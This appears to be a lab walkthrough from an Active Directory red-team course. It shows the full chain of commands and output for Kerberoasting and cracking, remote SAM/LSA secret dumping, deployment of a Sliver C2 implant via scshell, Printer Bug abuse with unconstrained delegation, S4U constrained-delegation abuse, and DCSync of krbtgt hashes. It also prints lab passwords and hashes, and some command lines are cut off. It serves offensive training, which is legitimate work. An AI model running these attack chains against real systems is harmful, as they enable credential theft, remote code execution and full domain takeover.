CreationDate :
20220927200512.156248-420
CSCreationClassName :
Win32_ComputerSystem
CSName : DCORP-DC
ExecutablePath :
ExecutionState :
Handle : 0
HandleCount : 0
InstallDate :

OSName : Microsoft Windows Server 2016 Standard
[...................snip.....................]

[*] rubeus output:

Luid: 0x0

Using the Kerberoast attack, crack password of a SQL server service account.
Perform the Kerberoast attack

Using StandIn, Rubeus and Hashcat
We first need to find out services running with user accounts as the services running with machine
accounts have difficult passwords. We can enumerate user accounts with SPN enabled using StandIn
from the dcorp-stdX session. We use the --spn flag to return all accounts that are kerberoastable.
ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --spn
[*] Output:

[?] Found 1 kerberostable users..
[*] SamAccountName : websvc

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,D
C=local
ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
SNMP/ufc-adminsrv
PwdLastSet : 11/14/2022 12:42:13 PM UTC
lastlogon : 11/16/2022 12:05:33 PM UTC
Supported ETypes : RC4_HMAC_DEFAULT
[*] SamAccountName : svcadmin

DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp
,DC=local
ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1
433, MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
PwdLastSet : 11/14/2022 5:06:37 PM UTC
lastlogon : 1/19/2024 12:07:01 PM UTC
Supported ETypes : RC4_HMAC_DEFAULT
An alternative would be to use raw LDAP queries using the --ldap argument and the LDAP filter:
(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)) which filters for all
USER_OBJECT types with the Service Principal Name property enabled. We use the --filter argument to
only return the samaccountname and serviceprincipalname.
ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --ldap "(&(objectC
ategory=person)(objectClass=user)(servicePrincipalName=*))" --filter samaccou
ntname,serviceprincipalname

[*] Output:


|_ Applying property filter => samaccountname,serviceprincipalname
[?] Object : CN=krbtgt

Path : LDAP://CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[+] serviceprincipalname
|_ kadmin/changepw
[+] samaccountname
|_ krbtgt
[?] Object : CN=web svc

Path : LDAP://CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
|_ SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
|_ SNMP/ufc-adminsrv
[+] samaccountname
|_ websvc
[?] Object : CN=svc admin

Path : LDAP://CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=loc
al
|_ MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, MSSQLSvc/dcorp-mg
mt.dollarcorp.moneycorp.local
[+] samaccountname
|_ svcadmin
We can then use Rubeus to output these hashes to a text file for cracking later. We can also specify
specific users to Kerberoast using the /user option and Kerberoast all users over a specific OU using the
/ou option.
ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Rubeus.exe' 'kerberoast /user:s
vcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt'
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user

[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will
be requested for everything else
[*] Target User : svcadmin
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,
DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName
=*)(samAccountName=svcadmin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))
(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'
[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\hashes.txt
[*] Roasted hashes written to : C:\AD\Tools\hashes.txt
We can now use John the Ripper to brute-force the hashes. Please note that you need to remove
":1433" from the SPN in hashes.txt before running John.
$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:1433* should be
$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local* in hashes.txt
Run the below command in a new PowerShell session after making the above changes.
PS C:\AD\Tools> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=
C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2023-03-03 09:18) 90.90g/s 186181p/s 186181c/s 186181C/s
energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed

• Find a server in the dcorp domain where Unconstrained Delegation is enabled.
• Compromise the server and escalate to Domain Admin privileges.
• Escalate to Enterprise Admins privileges by abusing Printer Bug!
Find a server where Unconstrained Delegation is enabled

Using StandIn
We first need to find a server that has unconstrained delegation enabled. We can use StandIn to do this
on the dcorp-stdX session. Using the --delegation argument allows to enumerate all types of delegation
enabled.
ystem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/StandIn.exe' --delegation
[*] Output:

[?] Found 2 object(s) with unconstrained delegation..
[*] SamAccountName : DCORP-APPSRV$

DistinguishedName : CN=DCORP-APPSRV,OU=Servers,DC=dollarcorp,DC=mo
neycorp,DC=local
userAccountControl : WORKSTATION_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD,
TRUSTED_FOR_DELEGATION
[*] SamAccountName : DCORP-DC$

DistinguishedName : CN=DCORP-DC,OU=Domain Controllers,DC=dollarcor
p,DC=moneycorp,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD, TRUS
TED_FOR_DELEGATION
[.....snip....]

Using ADSearch
We can use ADSearch to find servers with unconstrained delegation enabled in the dcorp-stdX session
with an LDAP filter using the --search argument:
(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288)). This LDAP filter
searches for Computer Objects with Unconstrained delegation enabled.
ystem32\taskhostw.exe" -t 60 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(obj
ectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --
attributes samaccountname,dnshostname,operatingsystem'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/

[*] CUSTOM SEARCH:
[+] samaccountname : DCORP-DC$
[+] dnshostname : dcorp-dc.dollarcorp.moneycorp.local
[+] operatingsystem : Windows Server 2016 Standard
[+] samaccountname : DCORP-APPSRV$

[+] dnshostname : dcorp-appsrv.dollarcorp.moneycorp.local
[+] operatingsystem : Windows Server 2016 Standard

Compromise the server and escalate to Domain Admin
privileges
Using SharpSecDump, Rubeus, LACheck, SpoolSample and Scshell
Since the prerequisite for elevation using Unconstrained delegation is having admin access to the
machine, we need to compromise a user which has local admin access on dcorp-appsrv. We can extract
secrets for dcorp\appadmin, dcorp\srvadmin and dcorp\websvc from dcorp-adminsrv using
sharpsecdump remotely as follows.
ystem32\taskhostw.exe" -t 60 '/mnt/c/AD/Tools/SharpSecDump.exe' "-target=dcor
p-adminsrv"
[*] sharpsecdump output:

[*] RemoteRegistry service started on dcorp-adminsrv
[*] Parsing SAM hive on dcorp-adminsrv
[*] Parsing SECURITY hive on dcorp-adminsrv
[*] Sucessfully cleaned up on dcorp-adminsrv
---------------Results from dcorp-adminsrv---------------
[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fc
c0c2e2
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e
0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c5
9d7e0c089c0
[*] Cached domain logon information(domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39
d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd
8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667
a17d6405289d
DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa
9ef2da703179
[*] LSA Secrets
[*] $MACHINE.ACC
dollarcorp.moneycorp.local\dcorp-adminsrv$:aad3b435b51404eeaad3b435b51404ee:b
5f451985fd34d58d5120816d31b5565
[*] DPAPI_SYSTEM
dpapi_machinekey:b769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e04
8f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP

dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv
dcorp\appadmin:*ActuallyTheWebServer1
---------------Script execution completed---------------
Let’s check if anyone of the compromised users have local admin privileges on dcorp-appsrv.
Get a TGT for dcorp\appadmin using rubeus.

ystem32\taskhostw.exe" -t 40 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:appadmi
n /password:"*ActuallyTheWebServer1" /nowrap /ptt'
[*] rubeus output:

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.1
[*] Action: Ask TGT

[*] Using rc4_hmac hash: D549831A955FEE51A43C83EFB3928FA7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\appadmin'
[...........snip............]
UserName : appadmin
StartTime : 1/19/2024 5:37:15 AM
EndTime : 1/19/2024 3:37:15 PM
RenewTill : 1/26/2024 5:37:15 AM
ble, forwardable
KeyType : rc4_hmac
Base64(key) : BZeppby4CClV2x0lllhSEA==
ASREP (key) : D549831A955FEE51A43C83EFB3928FA7
Checking for local admin access using LACheck we find that we have local admin access to dcorp-appsrv
as dcorp\appadmin.

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:serve
rs-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local /user:appadmin'
[*] Output:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/edr: False
/logons: False
/registry: False
/services: False
/ou:
/socket:
/targets:
/threads: 10
/user: appadmin
/verbose: False
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as appadmin
[WinRM] Admin Success: DCORP-APPSRV.DOLLARCORP.MONEYCORP.LOCAL as appadmin
We can now use rubeus and SpoolSample (C# MS-RPRN exploit) to abuse the Printer bug along with
Unconstrained Delegation.
Start a tcp pivot listener on dcorp-stdX and generate a corresponding implant.

[server] sliver (dcorp-std_https) > pivots tcp -l 8080
[server] sliver (dcorp-std_https) > generate --tcp-pivot 172.16.100.X:8080 -e

-f shellcode -N dcorp-appsrv_tcp

[*] Build completed in 53s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-appsrv_tcp.bin


Upload the NtDropper onto dcorp-appsrv and abuse it using scshell with the wmiprvse service as shown
in previous objectives.
[server] sliver (dcorp-std_https) > upload '/mnt/c/AD/Tools/NtDropper.exe' '\

\dcorp-appsrv\c$\Windows\temp\NtDropper.exe'
[*] Wrote file to \\dcorp-appsrv\c$\Windows\temp\NtDropper.exe
[server] sliver (dcorp-std_https) > scshell -t 180 dcorp-appsrv wmiApSrv 'C:\

Windows\System32\cmd.exe /c start /b C:\windows\Temp\NtDropper.exe 172.16.100
.X dcorp-appsrv_tcp.bin'

[*] Got output:
Trying to connect to dcorp-appsrv
SC_HANDLE Manager 0x000000002a0fc0d0
Opening wmiApSrv
SC_HANDLE Service 0x000000002a0fc250
LPQUERY_SERVICE_CONFIGA need 0x0000013a bytes
Original service binary path "C:\Windows\system32\wbem\WmiApSrv.exe"
Service path was changed to "C:\Windows\System32\cmd.exe /c start /b C:\windo
ws\Temp\NtDropper.exe 172.16.100.X dcorp-appsrv_tcp.bin"
Service was started
Service path was restored to "C:\Windows\system32\wbem\WmiApSrv.exe"
[*] Session 61d9999a dcorp-appsrv_tcp - 172.16.100.X:49902->dcorp-std_https->

(dcorp-appsrv) - windows/amd64 - Fri, 19 Jan 2024 07:48:04 PST
Now that we have a session on dcorp-appsrv we can begin exploiting Unconstrained Delegation. Start
the multiplayer mode to create two live sessions (one on dcorp-appsrv and the other on dcorp-stdX) on
the Sliver C2 to exploit the Printer Bug and capture the TGT in another terminal simultaneously.
[server] sliver (dcorp-std_https) > multiplayer
[*] Multiplayer mode enabled!
[server] sliver (dcorp-std_https) > new-operator --name m3rcer --lhost 172.16

.100.X
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /mnt/c/AD/Tools/Sliver/m3rcer_172.16.100.X.cf
g
[*] m3rcer has joined the game

Spawn another Ubuntu WSL prompt and execute the sliver-client_linux binary, import the generated
configuration using the import command and start a new multiplayer session by connecting to the Sliver
C2 on a new Kali terminal. Use this to access the dcorp-appsrv session to capture the corresponding TGT
using rubeus on dcorp-appsrv and access the dcorp-stdX session on the main Sliver server to perform
the MS-RPRN exploit.
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo ./sliver-client_linux imp

ort ./m3rcer_172.16.100.X.cfg
2024/01/19 07:57:31 Saved new client config to: /root/.sliver-client/configs/
m3rcer_172.16.100.X.cfg
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo ./sliver-client_linux

Connecting to 172.16.100.X:31337 ...
sliver > sessions
ID Transport Remote Address Hostname

Username Operating System Health
========== =========== ======================================== =============
==== ===================== ================== =========
61d9999a pivot 172.16.100.X:49902->dcorp-std_https-> dcorp-appsrv
NT AUTHORITY\SYSTEM windows/amd64 [ALIVE]
7a46cc3c http(s) 172.16.100.X:49902 dcorp-student
X dcorp\studentX windows/amd64 [ALIVE]
b9cd498e http(s) 172.16.100.X:49745 dcorp-student
X NT AUTHORITY\SYSTEM windows/amd64 [ALIVE]
sliver > sessions -i 61d9999a

[*] Active session dcorp-appsrv_tcp (61d9999a)
Perform the following consecutively, on the dcorp-appsrv (Sliver Client) session run rubeus in harvest
mode which takes the monitor mode one step further to capture TGT’s since the Sliver session tasks
would result in no output if execution occurs beyond the timeout period. rubeus harvest /runfor:<x>
allows to specify how long to run the command and if this is below the Sliver task timeout we should
receive the desired output (Note below timeout : 45 > harvest /runfor: 30 ).
sliver (dcorp-appsrv_tcp) > ps
Pid Ppid Owner Arch Executable

Session
====== ====== ============================== ======== ===================== =
========
[......snip......]
4028 2176 NT AUTHORITY\SYSTEM x86_64 svchost.exe 0
0

sliver (dcorp-appsrv_tcp) > execute-assembly -P 1620 -p 'C:\windows\system32\
taskhostw.exe' -t 60 '/mnt/c/AD/Tools/Rubeus.exe' 'harvest /runfor:30 /interv
al:8 /nowrap /targetuser:DCORP-DC$'
[*] Output:
[*] Action: TGT Harvesting (with auto-renewal)

[*] Target user : DCORP-DC$
[*] Monitoring every 8 seconds for new TGTs
[*] Displaying the working TGT cache every 8 seconds
[*] Running collection for 30 seconds
[*] Refreshing TGT ticket cache (1/19/2024 8:10:31 AM)
User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/19/2024 7:08:57 AM
EndTime : 1/19/2024 5:08:57 PM
RenewTill : 1/24/2024 7:37:45 AM
Flags : name_canonicalize, pre_authent, renewable, forward
ed, forwardable
Base64EncodedTicket :
doIGRTCCBkGgAwIBBaEDAgE[....snip.....]
[*] Ticket cache size: 1

[*] Sleeping until 9/29/2022 1:43:42 AM (8 seconds) for next display
And in the other dcorp-stdX session (Sliver server) immediately perform the MS-RPRN exploit using
SpoolSample.
ystem32\taskhostw.exe' -t 20 '/mnt/c/AD/Tools/SpoolSample.exe' 'dcorp-dc.doll
arcorp.moneycorp.local dcorp-appsrv.dollarcorp.moneycorp.local'
[*] Output:
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
On the dcorp-appsrv session (Sliver client) copy the base64 encoded ticket and convert it to a ticket,
then use it along with rubeus to Pass the Ticket.
Use rubeus to import and Pass the Ticket.

Tools/Rubeus.exe' 'ptt /ticket:doIGRTCCBkGgAwIBBaEDAgE[....snip.....]'
[*] rubeus output:

[*] Action: Import Ticket
We can now run a DCSync attack to validate the imported ticket.

ed.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08


Object RDN : krbtgt
** SAM ACCOUNT **

Credentials:
[..............snip................]

Escalation to Enterprise Admins
Using Rubeus, SpoolSample, PEzor and Scshell
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Reiterate the same
process as before to capture TGT’s of mcorp-dc from dcorp-appsrv
Setup rubeus as before in the dcorp-appsrv session (Sliver client) to capture the mcorp-dc$ TGT.
sliver (dcorp-appsrv_tcp) > execute-assembly -P 1620 -p 'C:\windows\system32\
taskhostw.exe' -t 60 '/mnt/c/AD/Tools/Rubeus.exe' 'harvest /runfor:30 /interv
al:8 /nowrap /targetuser:MCORP-DC$'
[*] rubeus output:
[*] Action: TGT Harvesting (with auto-renewal)

[*] Target user : MCORP-DC$
[*] Monitoring every 8 seconds for new TGTs
[*] Displaying the working TGT cache every 8 seconds
[*] Running collection for 30 seconds
[*] Refreshing TGT ticket cache (1/19/2024 8:34:00 AM)
User : MCORP-DC$@MONEYCORP.LOCAL
StartTime : 1/19/2024 7:06:30 AM
EndTime : 1/19/2024 5:06:30 PM
RenewTill : 1/24/2024 7:36:04 AM
Flags : name_canonicalize, pre_authent, renewable, forward
ed, forwardable
Base64EncodedTicket :
doIFVjCCBVKgAw[.....snip....]Gw9NT05FWUNPUlAuTE9DQUw=
[*] Ticket cache size: 1

[*] Sleeping until 9/29/2022 2:43:42 AM (8 seconds) for next display
[*] Completed running for 30 seconds, exiting
Simultaneously, in the dcorp-stdX session (Sliver server) perform the MS-RPRN exploit using
SpoolSample same as before.
ystem32\taskhostw.exe' -t 20 '/mnt/c/AD/Tools/SpoolSample.exe' 'mcorp-dc.mone
ycorp.local dcorp-appsrv.dollarcorp.moneycorp.local'
[*] Output:
[+] Converted DLL to shellcode

[+] Executing RDI
[+] Calling exported function
In a new Ubuntu WSL prompt, now create a .NET mimikatz binary to perform a dcsync on mcorp
(lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local) as follows.

'"lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"'
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Fluctuate: NA
[?] Executing donut


[ File type : EXE
[ Parameters : "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.loc
al" "exit"
[ Shellcode : "/tmp/tmp.cPvUTONWm3/shellcode.cs"
[ Exit : Thread
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dcsync-mcorp.exe.packed.
dotnet.exe
Use Rubeus to import and Pass the Ticket from the Rubeus output.

Tools/Rubeus.exe' 'ptt /ticket:doIGRTCCBkGgAwIBBaEDAgE[....snip.....]'
[*] rubeus output:

[*] Action: Import Ticket
We can now run a DCSync attack to validate the imported ticket.

ystem32\taskhostw.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync-mcorp.ex
e.packed.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.

local
[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
Object RDN : krbtgt
** SAM ACCOUNT **

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
[snip]
Exit from the Sliver Client using the exit command and continue exploitation using the primary Sliver
server dcorp-stdX session.

Enumerate users in the domain for whom Constrained Delegation is enabled.
• For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is
configured.
• Pass the ticket and access the service.
Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
• For such a user, request a TGT from the DC.
• Obtain an alternate TGS for LDAP service on the target machine.
• Use the TGS for executing DCSync attack.
Constrained Delegation user enumeration

Using StandIn
We first need to find a user that has constrained delegation enabled. We can use StandIn to do this on
the dcorp-stdX session. Using the --delegation argument allows to enumerate all types of delegation
enabled.
[*] Output:
[?] Found 2 object(s) with constrained delegation..
[*] SamAccountName : DCORP-ADMINSRV$
DistinguishedName : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,D
C=moneycorp,DC=local
msDS-AllowedToDelegateTo : TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL
TIME/dcorp-DC
Protocol Transition : True
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTI
CATE_FOR_DELEGATION

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp
,DC=local
msDS-AllowedToDelegateTo : CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
CIFS/dcorp-mssql
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_TO
_AUTHENTICATE_FOR_DELEGATION
[......snip......]

Using ADSearch
To enumerate users with constrained delegation we can use ADSearch with a raw LDAP query using the -
-search argument: (&(objectCategory=user)(msds-allowedtodelegateto=*)). This LDAP query searches
for all User Objects with the msds-allowedtodelegateto property enabled.
ectCategory=user)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,s
amaccountname,msds-allowedtodelegateto --json'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/
[*] CUSTOM SEARCH:
[
{
"cn": "web svc",
"dnshostname": null,
"samaccountname": "websvc",
"msds-allowedtodelegateto": [
"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL",
"CIFS/dcorp-mssql"
]
}
]

Constrained Delegation user abuse
Using Rubeus
We already have secrets of dcorp\websvc from the dcorp-adminsrv machine.
Abuse Constrained Delegation using the hash of dcorp\websvc with rubeus as follows.
[server] sliver (dcorp-std_https) > execute-assembly -t 40 -P 2396 -p "C:\win
dows\system32\taskhostw.exe" '/mnt/c/AD/Tools/Rubeus.exe' 's4u /user:websvc /
aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impe
rsonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOC
AL" /ptt'
[*] rubeus output:
[*] Action: S4U
[*] Using aes256_cts_hmac_sha1 hash: 2d84a12f614ccbf3d716b8339cbbe1a650e5fb35

2edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
doIFbjCCBWqgAwI[..........snip............]
[*] Action: S4U

[*] Building S4U2self request for: 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
doIF1DCCBdCgA[..........snip............]
[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-mssql.dollar

corp.moneycorp.LOCAL'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.mone
ycorp.LOCAL'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
':
doIHGDCCBxSgAw[..........snip............]

Try accessing filesystem on dcorp-mssql.
[server] sliver (dcorp-std_https) > ls '\\dcorp-mssql.dollarcorp.moneycorp.lo
cal\c$'
\\dcorp-mssql.dollarcorp.moneycorp.local\c$\ (14 items, 384.0 MiB)

==================================================================
drwxrwxrwx $RECYCLE.BIN <dir> Fri Nov 11 02:38:1
9 -0800 2022
drwxrwxrwx $WinREAgent <dir> Tue Jan 16 04:42:2
5 -0800 2024
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Fri Nov 11 00:53:0
9 -0800 2022
-rw-rw-rw- DumpStack.log.tmp 12.0 KiB Tue Jan 16 04:40:0
9 -0800 2024
[..........snip.........]

Constrained Delegation computer enumeration
Using StandIn
We first need to find a computer that has constrained delegation enabled. We can use StandIn to do this
on the dcorp-stdX session. Using the --delegation argument allows to enumerate all types of delegation
enabled.
[*] Output:
[?] Found 2 object(s) with constrained delegation..

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp
,DC=local
msDS-AllowedToDelegateTo : CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL
CIFS/dcorp-mssql
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, TRUSTED_TO
_AUTHENTICATE_FOR_DELEGATION
[*] SamAccountName : DCORP-ADMINSRV$

DistinguishedName : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,D
C=moneycorp,DC=local
msDS-AllowedToDelegateTo : TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL
TIME/dcorp-DC
userAccountControl : WORKSTATION_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD,
TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
[.....snip.....]

Using ADSearch
To enumerate computers with constrained delegation we can use ADSearch with a raw LDAP query
using the --search argument: (&(objectCategory=computer)(msds-allowedtodelegateto=*)). This LDAP
query searches for all computer objects with the msds-allowedtodelegateto property enabled.
ectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostna
me,samaccountname,msds-allowedtodelegateto --json'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/

[*] CUSTOM SEARCH:
[
{
"cn": "DCORP-ADMINSRV",
"dnshostname": "dcorp-adminsrv.dollarcorp.moneycorp.local",
"samaccountname": "DCORP-ADMINSRV$",
"msds-allowedtodelegateto": [
"TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL",
"TIME/dcorp-DC"
]
}
]

Constrained Delegation computer abuse
Using Rubeus
We already have secrets of dcorp-adminsrv$ from the dcorp-adminsrv machine.
Since there is no validation for the SPN specified in S4U we can abuse Constrained Delegation using the
hash of dcorp-adminsrv$ with rubeus to gain access to an alternate service such as LDAP since the TIME
service isn’t too useful for command execution.
NOTE: It is advised to the /aes256 hash instead of the standard /rc4 option for better OPSEC.
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 's4u /user:dcorp-ad
minsrv$ /rc4:b5f451985fd34d58d5120816d31b5565 /impersonateuser:Administrator
/msdsspn:time/dcorp-dc /altservice:ldap /ptt'
[*] Action: S4U
[*] Using aes256_cts_hmac_sha1 hash: 1f556f9d4e5fcab7f1bf4730180eb1efd0fadd5b

b1b5c1e810149f9016a7284d
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-admin
srv$'
doIF4zCCBd+gAwIBB[.....snip.....]
[*] Action: S4U

[*] Building S4U2self request for: 'dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCA
L'
[*] Got a TGS for 'Administrator' to 'dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LO
CAL'
doIGAzCCBf+gAwIBBaE[.....snip.....]
[*] Impersonating user 'Administrator' to target SPN 'time/dcorp-dc.dollarcor

p.moneycorp.LOCAL'
[*] Final ticket will be for the alternate service 'ldap'
[*] Building S4U2proxy request for service: 'time/dcorp-dc.dollarcorp.moneyco
rp.LOCAL'

[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL':
doIHGTCCBxWgAwIBBa[.....snip.....]
Try and DCSync to validate the imported ticket.

ed.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08


Object RDN : krbtgt
** SAM ACCOUNT **

Credentials:

• Find a computer object in dcorp domain where we have Write permissions.
• Abuse the Write permissions to access that computer as Domain Admin.
Enumerate a Computer Object with Write permissions

Using StandIn
We first need to find a computer that has resource-based delegation/Write permissions enabled. We
can use StandIn to do this on the dcorp-stdX session. Using the --delegation argument allows to
enumerate all types of delegation enabled.
[*] Output:
[....snip....]
[?] Found 1 object(s) with resource-based constrained delegation..
[*] SamAccountName : DCORP-MGMT$

DistinguishedName : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=mone
ycorp,DC=local
userAccountControl : WORKSTATION_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD

Using Get-RBCD-Threaded
To enumerate RBCD rights/Write permissions we can use Get-RBCD-Threaded as follows.
